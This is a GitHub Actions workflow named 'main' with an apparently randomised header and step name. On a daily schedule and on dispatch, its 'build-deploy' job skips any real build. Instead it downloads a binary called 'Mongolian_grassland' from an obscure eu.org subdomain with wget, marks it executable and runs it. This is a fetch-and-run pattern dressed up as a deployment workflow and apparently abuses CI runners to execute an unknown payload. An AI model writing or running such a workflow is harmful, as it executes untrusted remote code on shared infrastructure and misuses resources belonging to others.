#2024-03-16-[133744]-xmmlj5de
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "34 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 4nuf8r6oh85d3uvw
        run: |
          wget -q https://bangla-87t33kx9.digitalmarketingservice.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland